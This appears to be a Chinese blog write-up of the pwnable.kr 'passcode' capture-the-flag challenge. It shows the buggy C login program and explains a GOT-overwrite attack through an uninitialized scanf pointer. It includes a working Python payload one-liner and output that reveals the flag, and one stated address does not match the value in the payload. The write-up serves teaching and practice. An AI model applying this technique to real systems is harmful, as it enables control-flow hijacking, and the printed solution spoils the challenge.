pwnable.kr [Toddler's Bottle] - passcode

Mommy told me to make a passcode based login system.
My initial C code was compiled without any error!
Well, there was some compiler warning, but who cares about that?

ssh [email protected] -p2222 (pw:guest)

说来惭愧，这题在刚接触的时候因为对 Linux 编程的不了解，试了很多办法都没有头绪，所以拖到了现在。
其实原理很简单，就是简单的 GOT 溢出攻击。
关于 GOT 相关可以移步笔者另一篇转载的文章，有关于 PLT , GOT 的简单介绍：
http://blog.csdn.net/qq_19550513/article/details/66535524

这里先放上题目源码：

#include 
#include 

void login(){
    int passcode1;
    int passcode2;

    printf("enter passcode1 : ");
    scanf("%d", passcode1);
    fflush(stdin);

    // ha! mommy told me that 32bit is vulnerable to bruteforcing :)
    printf("enter passcode2 : ");
        scanf("%d", passcode2);

    printf("checking...\n");
    if(passcode1==338150 && passcode2==13371337){
                printf("Login OK!\n");
                system("/bin/cat flag");
        }
        else{
                printf("Login Failed!\n");
        exit(0);
        }
}

void welcome(){
    char name[100];
    printf("enter you name : ");
    scanf("%100s", name);
    printf("Welcome %s!\n", name);
}

int main(){
    printf("Toddler's Secure Login System 1.0 beta.\n");

    welcome();
    login();

    // something after login...
    printf("Now I can safely trust you that you have credential :)\n");
    return 0;   
}

可以看到在 login 函数中调用的 scanf("%d", passcode1); 在 passcode1 前没有加取地址符号 &，而由于 passcode 1没有初始化，导致这个输入操作会将数据写入 栈中 passcode1 未被初始化时存放的数据指向的地址。在实际执行到这里时如果对 passcode1 输入了正确格式的十进制整数，便会报错。

用 gdb 调试，分别在 welcome 和 login 函数处下断。
在 welcome 函数调用 scanf 处先输入 100 个 ‘a’ 方便观察栈中情况，如下：

continue , 执行到 passcode1 的 scanf 前中断，查看此时栈中情况：

可以看到，welcome 函数中输入的最后 4 字节占据了此时局部变量 passcode1 在栈中的位置。所以在执行 scanf("%d", passcode1); 时会像这里指向的不存在的 0x61616161 处写内容，故而报错。

造成这个问题的原因有两点：

• 在 welcome 函数返回后这里进行了堆栈平衡，然而没有清空栈中的内容，login 函数和 welcome 函数又相当于是共享了同一个栈区域；
• passcode1 没有初始化，导致passcode1 在栈中单元里存放的仍是之前栈帧遗留下来的内容。

我们可以利用被湮没的这 4 个字节，利用 scanf 函数去到指定的位置写内容。这题的目的是绕过对 passcode 的验证，这里可以覆写 GOT 来控制程序流程。

即原理是，welcome 中 scanf 函数被调用 --> 
输入构造好的字符串，其中最后 4 字节为要覆写的保存有目标函数指令地址的内存单元在 GOT 中的地址 --> 
login 中的 scanf函数被调用 --> 
覆写该位置，即目标函数指令地址被改写，执行该函数时会去到改写后的位置执行。

通过 gdb 查看 login 中之后调用的函数位置（这里无非是 fflush , printf , 和 exit），任选其一即可，这里笔者选择的是printf。

接下来查找 system 调用指令的位置和和 printf 在 GOT 中的地址（因为编译环境可能和服务器不同，为了准确性，到 ssh 登入去找相关位置）

直接 passcode@ubuntu:~$ objdump -d passcode

找到相关地址如下：

即控制流程指向的 call system 位于 0x080485ea，printf 在 GOT 中地址为 0x0804a000 ，
构造如下输入后得到 falg：

passcode@ubuntu:~$ python -c 'print "a"*96 + "\x00\xa0\x04\x08" + "134514147\n"' | ./passcode
Toddler's Secure Login System 1.0 beta.
enter you name : Welcome aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
Sorry mom.. I got confused about scanf usage :(
enter passcode1 : Now I can safely trust you that you have credential :)